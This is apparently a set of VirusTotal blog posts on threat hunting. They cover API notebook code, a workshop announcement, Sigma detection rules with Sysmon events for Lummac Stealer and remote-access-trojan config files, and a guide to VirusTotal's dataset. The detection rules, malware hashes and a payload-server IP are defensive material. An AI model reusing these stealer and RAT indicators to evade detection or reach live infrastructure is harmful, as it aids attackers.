Get the bundled_files and create a new dataframe with them too, but store only those having 5 or more malicious value.

Then identify the top 5 magika of those bundled files obtained

Code generated:

Step 1

query_results_with_bundled_files = []

# Define the search query string
query = "fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight"

# Define the relationship to request
RELATIONS = "bundled_files"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_bundled_files.append(itemobj.to_dict())

# Convert query_results_with_bundled_files to a list called crx_files_with_bundled_files
crx_files_with_bundled_files = list(query_results_with_bundled_files)

# Print the number of found CRX files with bundled file data.
print(f"Found {len(crx_files_with_bundled_files)} CRX files with bundled file data matching the criteria.")

Step 2

import pandas as pd

# List to store all bundled file attributes
all_bundled_files_data = []

# Iterate through each CRX file with bundled file data
for crx_file in crx_files_with_bundled_files:
    if 'relationships' in crx_file and 'bundled_files' in crx_file['relationships']:
        for bundled_file in crx_file['relationships']['bundled_files']['data']:
            all_bundled_files_data.append(bundled_file.get('attributes', {}))

# Create a DataFrame from the extracted bundled file attributes
df_bundled_files = pd.json_normalize(all_bundled_files_data)

# Filter for bundled files with 5 or more malicious detections
df_malicious_bundled_files = df_bundled_files[df_bundled_files['last_analysis_stats.malicious'] >= 5]

print(f"Total bundled files extracted: {len(df_bundled_files)}")
print(f"Bundled files with 5 or more malicious detections: {len(df_malicious_bundled_files)}")

df_malicious_bundled_files.head()

Step 3

import pandas as pd
import plotly.express as px

# Check if the 'magika' column exists and is not empty in the filtered DataFrame
if 'magika' in df_malicious_bundled_files.columns and not df_malicious_bundled_files['magika'].empty:
    # Count the occurrences of each magika type
    magika_counts = df_malicious_bundled_files['magika'].value_counts().reset_index()
    magika_counts.columns = ['Magika Type', 'Count']

    # Get the top 5 most frequent magika types
    top_5_magika = magika_counts.head(5)

    print("Top 5 Magika Types in malicious bundled files:")
    print(top_5_magika)

    # Visualize the top 5 magika types
    fig = px.bar(top_5_magika,
                 x='Count',
                 y='Magika Type',
                 orientation='h',
                 title='Top 5 Magika Types in Malicious Bundled Files',
                 labels={'Count': 'Number of Occurrences', 'Magika Type': 'Magika Type'}) 
    fig.update_layout(yaxis={'categoryorder':'total ascending'}) # Order bars by count
    fig.show()
else:
    print("The 'magika' column was not found or is empty in the filtered malicious bundled files DataFrame. Cannot identify top magika types.")

Retrieve threat actors:

Retrieve threat actors targeting the United Kingdom with an espionage motivation. Sort the results in descending order of relevance. Display the total number of threat actors and their names.

Investigate campaigns:

Retrieve information about threat actors and malware involved in campaigns targeting Pakistan. For each threat actor, retrieve its country of origin, motivations, and targeted industries. For each malware, retrieve its name.

What’s next

This workshop, co-authored with Aleksandar from SentinelLabs, will be presented at future conferences to show the community how to get the most out of the VirusTotal API. We'll be updating the content of our meta colab regularly and will share more information soon about how to access the Google Colab.

In the meantime, if you have any feedback or ideas to contribute, we are open to suggestions.

VirusTotal Blog
Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs 5 September 2025 at 11:53

Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

By: Joseliyo Sánchez

5 September 2025 at 11:53

We are excited to announce that our colleague Joseliyo Sánchez will be at Labscon to present our workshop: Advanced Threat Hunting: Automating Large-Scale Operations with LLMs. This workshop is a joint effort with SentinelOne and their researcher, Aleksandar Milenkoski.

In today's rapidly evolving threat landscape, security professionals face an overwhelming tide of data and increasingly sophisticated adversaries. This hands-on workshop is designed to empower you to move beyond the traditional web interface and harness the full potential of the VirusTotal Enterprise API for large-scale, automated threat intelligence and hunting.

We will dive deep into how you can use the VirusTotal Enterprise API with Python and Google Colab notebooks to automate the consumption of massive datasets. You'll learn how to track the behaviors of advanced persistent threat (APT) actors and cybercrime groups through practical, real-time exercises.

A key part of our workshop will focus on leveraging Large Language Models (LLMs) to supercharge your analysis. We'll show how you can use AI to help understand complex data, build better queries, and create insightful visualizations to enrich your information for a deeper understanding of threats.

This session is ideal for cyber threat intelligence analysts, threat hunters, incident responders, SOC analysts, and security researchers looking to automate and scale up their threat hunting workflows.

After the workshop, we will publish a follow-up blog post that will delve deeper into some of the exercises and examples presented, providing a valuable resource for further learning and implementation.

We look forward to seeing you at Labscon!

(All of the scenarios are compatible with Google Threat Intelligence)

----

Conference website: https://www.labscon.io/

Date: September 17-20, 2025

Registration: Invite-Only

Place: Scottsdale, Arizona

Duration: 3-5h

VirusTotal Blog
Research that builds detections 9 January 2025 at 09:51

Research that builds detections

By: Joseliyo Sánchez

9 January 2025 at 09:51

Note: You can view the full content of the blog here.

Introduction

Detection engineering is becoming increasingly important in surfacing new malicious activity. Threat actors might take advantage of previously unknown malware families - but a successful detection of certain methodologies or artifacts can help expose the entire infection chain.

In previous blog posts, we announced the integration of Sigma rules for macOS and Linux into VirusTotal, as well as ways in which Sigma rules can be converted to YARA to take advantage of VirusTotal Livehunt capabilities. In this post, we will show different approaches to hunt for interesting samples and derive new Sigma detection opportunities based on their behavior.

Tell me what role you have and I'll tell you how you use VirusTotal

VirusTotal is a really useful tool that can be used in many different ways. We have seen how people from SOCs and Incident Response teams use it (in fact, we have our VirusTotal Academy videos for SOC and IR teams), and we have also shown how those who hunt for threats or analyze those threats can use it too.

But there's another really cool way to use VirusTotal - for people who build detections and those who are doing research. We want to show everyone how we use VirusTotal in our work. Hopefully, this will be helpful and also give people ideas for new ways to use it themselves.

To explain our process, we used examples of Lummac and VenomRAT samples that we found in recent campaigns. These caught our attention due to some behaviors that had not been identified by public detection rules in the community. For that reason we have created two Sigma rules to share with the community, but if you want to get all the details about how we identified it and started our research, go to our Google Threat Intelligence community blog.

Our approach

As detection engineers, it is important to look for techniques that can be in use by multiple threat actors - as this makes tracking malicious activity more efficient. Prior to creating those detections, it is best to check existing research and rule collections, such as the Sigma rules repository. This can save time and effort, as well as provide insight into previously observed samples that can be further researched.

A different approach would be to instead look for malicious files that are not detected by existing Sigma rules, since they can uncover novel methodologies and provide new opportunities for detection creation.

One approach is to hunt for files that are flagged by at least five different AV vendors, were uploaded within the last month, have sandbox execution (in order to view their behavior), and have not triggered any Crowdsourced Sigma rules.

p:5+ have:behavior fs:30d+ not have:sigma

This initial query can be adapted to incorporate additional filters that the researcher may find relevant. These could include modifiers to identify, for example, the presence of the PowerShell process in the list of executed processes (behavior_created_processes:powershell.exe), to restrict results to documents (type:document), or to identify communication with services like Pastebin (behavior_network:pastebin.com).

Another way to go is to look at files that have been flagged by at least five AV vendors and were tested in either Zenbox or CAPE. These sandboxes often have great logs produced by Sysmon, which are really useful for figuring out how to spot these threats. Again, we'd want to focus on files uploaded in the last month that haven't triggered any Sigma rules. This gives us a good starting point for building new detection rules.

p:5+ (sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox") fs:30d+ not have:sigma

Lastly, another idea is to look for files that have not triggered many high severity detections from the Sigma Crowdsourced rules, as these can be more evasive. Specifically, we will look for samples with zero critical, high or medium alerts - and no more than two low severity ones.

p:5+ have:behavior fs:30d+ sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-

With these queries, we can start investigating samples that may be good candidates for new detection rules.
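The three queries above share the same base filters (p:5+ and fs:30d+). As a minimal sketch, they can be composed programmatically so that variations stay consistent. The helper name build_hunt_query and its parameters are hypothetical; only the search modifiers come from the queries above. The modifiers are emitted in a different order than in the text, which should not matter because space-separated modifiers are combined with an implicit AND.

```python
def build_hunt_query(*extra_filters, min_detections=5, max_age_days=30):
    """Compose a search query string from the base filters used above.

    Hypothetical helper: it only concatenates search modifiers into a string
    and does not contact VirusTotal.
    """
    base = [f"p:{min_detections}+", f"fs:{max_age_days}d+"]
    return " ".join(base + list(extra_filters))


# Query 1: sandbox behavior available, no Crowdsourced Sigma rule matched
no_sigma = build_hunt_query("have:behavior", "not have:sigma")

# Query 2: restricted to the sandboxes that provide Sysmon logs
sysmon_sandboxes = build_hunt_query(
    '(sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox")',
    "not have:sigma",
)

# Query 3: no critical/high/medium Sigma alerts and at most two low ones
low_noise = build_hunt_query(
    "have:behavior",
    "sigma_critical:0",
    "sigma_high:0",
    "sigma_medium:0",
    "sigma_low:2-",
)

# Query 1 narrowed with one of the optional modifiers mentioned earlier
powershell_only = build_hunt_query(
    "have:behavior",
    "not have:sigma",
    "behavior_created_processes:powershell.exe",
)

for query in (no_sigma, sysmon_sandboxes, low_noise, powershell_only):
    print(query)
```

The resulting strings can be pasted into the search box or passed as the query parameter of an intelligence search.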

Our detections for the community

Our approach helps us identify behaviors that seem interesting and worth focusing on. In our blog, where we explain this approach in detail, we highlighted two campaigns linked to Lummac and VenomRAT that exhibited interesting activity. Because of this, we decided to share the Sigma rules we developed for these campaigns. Both rules have been published in Sigma's official repository for the community.

Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

Sigma rule on GitHub: https://github.com/SigmaHQ/sigma/blob/master/rules-emerging-threats/2024/Malware/Lummac-Stealer/proc_creation_win_malware_lummac_more_vbc.yml

title: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed in a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
references:
    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-11-14
tags:
    - attack.defense-evasion
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
    selection_parent:
        ParentImage|endswith: '\more.com'
    selection_child:
        - Image|endswith: '\vbc.exe'
        - OriginalFileName: 'vbc.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

Sysmon event for: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 1,
    "Version": 5,
    "Level": 4,
    "Task": 1,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-11-26T16:23:05.132539500Z"
    },
    "EventRecordID": 692861,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2396,
      "ThreadID": 3116
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-11-26 16:23:05.064",
    "ProcessGuid": "{C784477D-F5E9-6745-6006-000000003F00}",
    "ProcessId": 4184,
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "FileVersion": "14.8.3761.0",
    "Description": "Visual Basic Command Line Compiler",
    "Product": "Microsoft® .NET Framework",
    "Company": "Microsoft Corporation",
    "OriginalFileName": "vbc.exe",
    "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "CurrentDirectory": "C:\\Users\\george\\AppData\\Roaming\\comlocal\\RUYCLAXYVMFJ\\",
    "User": "DESKTOP-B0T93D6\\george",
    "LogonGuid": "{C784477D-9D9B-66FF-6E87-050000000000}",
    "LogonId": "0x5876e",
    "TerminalSessionId": 1,
    "IntegrityLevel": "High",
    "Hashes": {
      "SHA1": "61F4D9A9EE38DBC72E840B3624520CF31A3A8653",
      "MD5": "FCCB961AE76D9E600A558D2D0225ED43",
      "SHA256": "466876F453563A272ADB5D568670ECA98D805E7ECAA5A2E18C92B6D3C947DF93",
      "IMPHASH": "1460E2E6D7F8ECA4240B7C78FA619D15"
    },
    "ParentProcessGuid": "{C784477D-F5D4-6745-5E06-000000003F00}",
    "ParentProcessId": 6572,
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
    "ParentCommandLine": "C:\\Windows\\SysWOW64\\more.com",
    "ParentUser": "DESKTOP-B0T93D6\\george"
  }
}
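To make the link between the rule and this event explicit, here is a minimal Python sketch of the rule's detection logic applied to the relevant EventData fields. It is only an illustration of the matching semantics (case-insensitive string matching, list items combined with OR, and "all of selection_*" combining the selections with AND), not how a Sigma backend is implemented. The function names are hypothetical.

```python
def endswith_ci(value, suffix):
    """Case-insensitive suffix match, mirroring Sigma's default string matching."""
    return value.lower().endswith(suffix.lower())


def matches_lummac_rule(event_data):
    """Return True if a Sysmon Event ID 1 EventData dict satisfies the rule."""
    # selection_parent: the parent process image must end with \more.com
    selection_parent = endswith_ci(event_data.get("ParentImage", ""), "\\more.com")

    # selection_child: a list of two maps, so either condition is sufficient
    selection_child = (
        endswith_ci(event_data.get("Image", ""), "\\vbc.exe")
        or event_data.get("OriginalFileName", "").lower() == "vbc.exe"
    )

    # condition: all of selection_*
    return selection_parent and selection_child


# Fields copied from the Sysmon event above
event_data = {
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "OriginalFileName": "vbc.exe",
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
}

print(matches_lummac_rule(event_data))
```

Swapping ParentImage for any other parent process makes the check fail, which is the behavior the rule relies on to keep false positives low.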

File Creation Related To RAT Clients

Sigma rule on GitHub: https://github.com/SigmaHQ/sigma/blob/fad4742996c55d8d4663e611f84877a2b741dc46/rules-emerging-threats/2024/Malware/Generic/file_event_win_malware_generic_creation_configuration_rats.yml

title: File Creation Related To RAT Clients
id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
status: experimental
description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
references:
    - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
    - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-11-15
tags:
    - attack.execution
logsource:
    category: file_event
    product: windows
detection:
    # VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
    # VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
    selection_required:
        TargetFilename|contains: '\AppData\Roaming\'
    selection_variants:
        TargetFilename|endswith:
            - '\datalogs.conf'
            - '\hvnc.conf'
            - '\dcrat.conf'
        TargetFilename|contains:
            - '\mydata\'
            - '\datalogs\'
            - '\hvnc\'
            - '\dcrat\'
    condition: all of selection_*
falsepositives:
    - Legitimate software creating a file with the same name
level: high

Sysmon event for: File Creation Related To RAT Clients

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 11,
    "Version": 2,
    "Level": 4,
    "Task": 11,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-12-02T00:52:23.072811600Z"
    },
    "EventRecordID": 1555690,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2624,
      "ThreadID": 3112
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-12-02 00:52:23.059",
    "ProcessGuid": "{C784477D-04C6-674D-5C06-000000004B00}",
    "ProcessId": 7592,
    "Image": "C:\\Users\\george\\Desktop\\ezzz.exe",
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf",
    "CreationUtcTime": "2024-12-02 00:52:23.059",
    "User": "DESKTOP-B0T93D6\\george"
  }
}
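As with the previous rule, the detection logic can be sketched in a few lines of Python to show why this event matches. Within selection_variants the two keys are combined with AND, while the values listed under each key are combined with OR. The function name is hypothetical, and this is an illustration of the semantics rather than a Sigma backend.

```python
FILE_SUFFIXES = ("\\datalogs.conf", "\\hvnc.conf", "\\dcrat.conf")
FOLDER_PARTS = ("\\mydata\\", "\\datalogs\\", "\\hvnc\\", "\\dcrat\\")


def matches_rat_conf_rule(target_filename):
    """Return True if a Sysmon Event ID 11 TargetFilename satisfies the rule."""
    name = target_filename.lower()  # Sigma string matching is case-insensitive

    # selection_required: the file must be created under AppData\Roaming
    selection_required = "\\appdata\\roaming\\" in name

    # selection_variants: one of the file names AND one of the folder names
    selection_variants = name.endswith(FILE_SUFFIXES) and any(
        part in name for part in FOLDER_PARTS
    )

    # condition: all of selection_*
    return selection_required and selection_variants


# TargetFilename copied from the Sysmon event above
target = "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf"
print(matches_rat_conf_rule(target))
```

A file with the same name in an unrelated folder, or outside AppData\Roaming, does not satisfy both selections, which is what limits matches on legitimate software.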

Wrapping up

Detection engineering teams can proactively create new detections by hunting for samples that are being distributed and uploaded to our platform. Applying our approach helps in developing detections for recent behaviors that are not yet covered by existing detection mechanisms. This could help organizations be proactive in creating detections based on threat hunting missions.

The Sigma rules created to detect Lummac activity have been used during threat hunting missions to identify new samples of this family in VirusTotal. Another use is translating them into the language of the SIEM or EDR available in the infrastructure, as they could help identify potential behaviors related to Lummac samples observed in late 2024. After passing quality controls and being published on Sigma's public GitHub, they have been integrated for use in VirusTotal, delivering the expected results. You can use them in the following way:

Lummac Stealer Activity - Execution Of More.com And Vbc.exe

sigma_rule:a1021d4086a92fd3782417a54fa5c5141d1e75c8afc9e73dc6e71ef9e1ae2e9c

File Creation Related To RAT Clients

sigma_rule:8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252

We hope you found this blog interesting and useful, and as always we are happy to hear your feedback.

VirusTotal Blog
Exploring the VirusTotal Dataset | An Analyst's Guide to Effective Threat Research 29 August 2024 at 10:56

Exploring the VirusTotal Dataset | An Analyst's Guide to Effective Threat Research

By: Joseliyo Sánchez

29 August 2024 at 10:56

By Aleksandar Milenkoski (SentinelOne) and Jose Luis Sánchez Martínez

VirusTotal stores a vast collection of files, URLs, domains, and IPs submitted by users worldwide. It features a variety of functionalities and integrates third-party detection engines and tools to analyze the maliciousness of submitted artifacts and gather relevant related information, such as file properties, domain registrars, and execution behaviors.

The VirusTotal dataset, the backbone of the platform, structures artifact-related information into objects and represents relevant relationships between them, providing contextual links between various artifacts. This makes VirusTotal a valuable resource for threat research, enabling users to perform activities such as clustering artifacts related to specific threat actors or campaigns, tracking malicious activities, and analyzing trends in the threat landscape.

In this post, part of a collaborative effort between VirusTotal and SentinelLabs, we explore how to effectively use VirusTotal’s wide range of querying capabilities, highlight scenarios in which these capabilities return informative results, and discuss factors that may impact the completeness or relevance of the data.

The content is aimed at VirusTotal users seeking to better understand the fundamental inner workings of the platform and how to effectively use it as part of their investigations. This contribution complements the comprehensive VirusTotal documentation by discussing certain aspects in greater detail along with a summary of relevant context and usage information, and demonstrating how VirusTotal capabilities are applied in real-world cases.

Overview

The VirusTotal platform analyzes files and network-related artifacts (URLs, domains, and IPs) submitted to the platform to detect maliciousness. The platform aggregates results from third-party detection engines, web scanners, and other tools to provide thorough analysis overviews.

VirusTotal stores submitted artifacts as well as information related to each artifact in a dataset, which we refer to as the VirusTotal dataset. The artifact-related information is extensive and diverse, including, for example, file properties such as filename, file type, digital signatures, and hashes, as well as URL components such as domains, URL paths, and URL query parameters.

VirusTotal provides interfaces for users to interact with the platform and search filters for querying it. The search filters allow for retrieving and pivoting through artifact-related information. Additionally, they enable clustering multiple artifacts and identifying newly submitted ones based on user-defined queries aimed at capturing overlaps in content or related information. This has many use cases in threat intelligence, such as identifying trends in the threat landscape, commonalities between different threats, and tracking specific threat groups or campaigns.

Below, we first provide an overview of the VirusTotal dataset structure and the different interfaces available for interacting with it, with a focus on querying the dataset using search filters. We then delve into search modifiers, a specific type of VirusTotal search filter, highlighting modifiers for querying data generated by artificial intelligence (AI) technology. Next, we discuss factors that may impact the relevance or completeness of results when querying using search modifiers, including an example of using search modifiers in an actual threat research investigation.

The VirusTotal Dataset

The VirusTotal dataset is the backbone of the VirusTotal platform. Current records indicate that it stores a vast amount of submitted artifacts and related information, including over 50 billion files, 6 billion URLs, and 4 billion domains. The data is stored in a structured and hierarchical manner.

The top-level structure of the VirusTotal dataset

Artifact-related information is structured into objects, which have an ID, a type, and attributes. Optionally, objects may also have one or multiple relationships.

VirusTotal objects

The object ID uniquely identifies an object. An object can be directly related to a submitted artifact: a file, URL, domain, or IP address. In this case, the object's ID is derived from the artifact itself: the SHA-256 hash for files, the IP address or domain itself for IPs or domains, and the SHA-256 hash or the Base64-encoded form of the URL for URLs.
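As a minimal sketch of how such IDs can be derived locally, the snippet below computes a file ID from file content and a URL ID from the URL string. The function names are hypothetical, and the URL variant assumes the unpadded, URL-safe Base64 encoding; the SHA-256 form of a URL ID depends on the platform's URL normalization and is not reproduced here.

```python
import base64
import hashlib


def file_object_id(content: bytes) -> str:
    """File objects are identified by the SHA-256 hash of the file content."""
    return hashlib.sha256(content).hexdigest()


def url_object_id(url: str) -> str:
    """URL identifier as Base64 (assumption: URL-safe alphabet, padding stripped)."""
    return base64.urlsafe_b64encode(url.encode()).decode().strip("=")


def decode_url_object_id(url_id: str) -> str:
    """Reverse url_object_id by restoring the stripped padding."""
    padding = "=" * (-len(url_id) % 4)
    return base64.urlsafe_b64decode(url_id + padding).decode()


sample_url = "http://www.example.com/"
url_id = url_object_id(sample_url)

print(file_object_id(b""))           # SHA-256 of an empty file
print(url_id)
print(decode_url_object_id(url_id))  # round-trips to the original URL
```

Domains and IP addresses need no transformation, since the value itself is the ID.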

An object type indicates the type of information stored by an object. For example, an object of type file stores file-specific information about submitted files, such as filenames, file hashes, and the file extension, whereas an object of type domain stores domain-specific information about submitted domains, such as the domain’s registrar. The objects of type file, url, ip, or domain are directly related to submitted artifacts, while the rest, such as threat_actor or reference, are not.

An attribute is a data item that stores information related to an object and can be of a primitive or a complex data type, such as an array or a structure. For example, the file object (an object of type file) includes the string attribute sha256. This attribute stores the SHA-256 hash of a submitted file. Additionally, it may contain the attribute lnk_info, specifically present for Windows Shortcut (LNK) files. lnk_info is a structure containing information specific to LNK files and extracted from the submitted file, such as the date on which the shortcut was created.

Relationships signify connections between objects of the same or different types, making them particularly useful for describing scenarios involving multiple artifacts. For instance, the malicious file config.lnk (SHA-256 hash 85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61) communicates with the IP address 149.51.230[.]198 to download a payload.

In the context of VirusTotal, this relationship is represented through the communicating_files relationship of the ip_address object, which is directly related to 149.51.230[.]198. communicating_files stores information about all files, in the form of file objects, observed to communicate with the IP address during sandbox execution. VirusTotal executes submitted executable files in sandboxes to capture behaviors and artifacts visible only while the file is executing, such as started processes, network communications, changes to the file system, or strings present in process memory.
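The object structure described above (ID, type, attributes, and optional relationships) can be pictured with a small in-memory model. This is a simplified sketch for illustration only: the VTObject class is hypothetical and does not mirror the platform's internal representation or the exact shape of API responses. The IP address is kept in its defanged form.

```python
from dataclasses import dataclass, field

LNK_SHA256 = "85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61"


@dataclass
class VTObject:
    """Hypothetical, simplified model of an object in the dataset."""
    id: str
    type: str
    attributes: dict = field(default_factory=dict)
    # Relationship name -> list of related objects
    relationships: dict = field(default_factory=dict)


# File object: the ID is the SHA-256 hash, also exposed as the sha256 attribute
config_lnk = VTObject(
    id=LNK_SHA256,
    type="file",
    attributes={"sha256": LNK_SHA256},
)

# IP address object: the ID is the address itself (defanged here on purpose)
ip_object = VTObject(
    id="149.51.230[.]198",
    type="ip_address",
    relationships={"communicating_files": [config_lnk]},
)

# Pivot from the IP address to the files observed communicating with it
for related in ip_object.relationships["communicating_files"]:
    print(related.type, related.id)
```

Pivoting then amounts to following a named relationship from one object to the objects it points to.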

The communicating_files relationship

Top-level collections group all objects of the same type. The top-level collections that VirusTotal currently implements are files (a set of all objects of type file), urls (a set of all objects of type url), ips (a set of all objects of type ip), domains (a set of all objects of type domain), collections (a set of all objects of type collection), threat actors (a set of all objects of type threat_actor), and references (a set of all objects of type reference).

The object of type collection is not to be confused with top-level collections. This object groups multiple objects of the same or different types given a user-specified context, such as a threat actor, a malicious campaign, or a malware family.

The top-level collections enable operations that relate to the set of all objects of a given type. One such operation is submitting a new file for analysis, which adds an object of type file to the files collection.

Querying VirusTotal

VirusTotal exposes two interfaces for interacting with its dataset: the platform’s graphical user interface (GUI) for manual interaction and the application programming interface (API) for programmatic interaction.

The VirusTotal GUI

The VirusTotal GUI is the web interface of the platform. To query VirusTotal using the GUI, users enter a search query into the search field. A search query is composed of one or multiple search filters.

A search filter can be a value uniquely identifying a submitted artifact – a URL, domain, file hash (MD5, SHA-1, or SHA-256), or an IP address. This filter cannot be combined with other filters and is used for retrieving information related to only a single submitted artifact.

When a user inputs a value, VirusTotal retrieves the corresponding artifact and related information from its dataset and displays this data to the user as a web analysis report. To retrieve the artifact and its related information, VirusTotal searches its dataset for an object that has an ID or an attribute (for MD5 or SHA-1 hashes) that matches the user-provided value. The platform also explores relationships to and from this object.
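When automating lookups, it can help to decide up front what kind of value is being searched. The sketch below is a rough local heuristic, not the platform's own logic: it classifies a value as a hash (by length), an IP address, a URL, or a domain, and records whether the lookup would match an object ID or an attribute, following the description above. All names are hypothetical.

```python
import ipaddress
import re

HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}

# Per the description above: MD5 and SHA-1 hashes match an attribute,
# while the other values match the object ID directly.
MATCHED_ON = {
    "md5": "attribute",
    "sha1": "attribute",
    "sha256": "id",
    "ip_address": "id",
    "url": "id",
    "domain": "id",
}


def classify_search_value(value: str) -> str:
    """Guess the kind of artifact a search value identifies (heuristic)."""
    value = value.strip()
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in HASH_LENGTHS:
        return HASH_LENGTHS[len(value)]
    try:
        ipaddress.ip_address(value)
        return "ip_address"
    except ValueError:
        pass
    if "://" in value:
        return "url"
    return "domain"


for candidate in (
    "85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61",
    "8.8.8.8",
    "https://example.com/path",
    "example.com",
):
    kind = classify_search_value(candidate)
    print(f"{kind:<10} matched on {MATCHED_ON[kind]}")
```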

Web analysis report (search query: 85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61)

Querying using a value uniquely identifying a submitted artifact

A search filter can also be a search modifier in the format modifier:value, where value may be a predefined or a user-specified search criterion.

Each modifier is mapped to one or more of the top-level collections files, urls, ips, domains, and collections, forming sets of file-, URL-, IP-, domain-, and collection-specific search modifiers. Further information on these modifiers can be found in the official VirusTotal documentation.

Multiple modifiers can be combined into more complex search queries using the logical operators AND, OR, and NOT. Parentheses can be used to group modifiers and logical operators, allowing for more precise queries by controlling the order of operations. All modifiers within a search query must be mapped to a single top-level collection.

A special modifier is entity, which defines the top-level collection to which the search query is applied. For example, entity:file applies the search query to the files collection, and entity:url applies the query to the urls collection. If a user does not explicitly specify the entity modifier, the platform defaults to entity:file.
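Queries that mix logical operators are easy to get wrong when written by hand, so it can be convenient to build them from small functions that add parentheses automatically. The following is a minimal sketch: the helper names (all_of, any_of, negate, scoped) are hypothetical, and the functions only produce query strings using modifiers that appear elsewhere in this post and in the official documentation.

```python
def _group(operator, terms):
    """Join terms with a logical operator, parenthesizing compound results."""
    joined = f" {operator} ".join(terms)
    return f"({joined})" if len(terms) > 1 else joined


def all_of(*terms):
    """Every term must match (AND)."""
    return _group("AND", terms)


def any_of(*terms):
    """At least one term must match (OR)."""
    return _group("OR", terms)


def negate(term):
    """The term must not match (NOT)."""
    return f"NOT {term}"


def scoped(query, entity="file"):
    """Prefix the entity modifier; 'file' mirrors the platform default."""
    return f"entity:{entity} AND {query}"


lnk_query = scoped(
    all_of("type:lnk", any_of("p:5+", "fs:2024-07-15+"), negate("have:sigma"))
)
domain_query = scoped("domain:test", entity="domain")

print(lnk_query)
print(domain_query)
```

Because every modifier in a query must map to the same top-level collection, keeping the entity in a single scoped call makes it harder to mix file and domain modifiers by accident.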

Structured overview of commonly used file-specific search modifiers (entity:file)

For each modifier, VirusTotal searches for and retrieves objects within the collection that the modifier is mapped to. These objects have an ID or attribute, or a relationship to another object with an ID or attribute, that meets the search criterion. For example, entity:domain AND domain:test instructs VirusTotal to retrieve all objects of type domain whose IDs (the domains themselves) contain the string test. An exception is the content modifier, which instructs the platform to search through the content of submitted files.

In the case of a complex search query combining multiple modifiers using AND, OR, and/or NOT, VirusTotal combines the retrieved objects for each modifier into a resulting set that meets the combined criteria.

The platform then displays an overview of the resulting set of objects to the user in the form of a list of web analysis results. When a user clicks on an item in the list, the platform generates a web analysis report based on the corresponding object’s ID, as described previously.

List of web analysis results (search query: entity:domain AND domain:test)

Querying using search modifiers

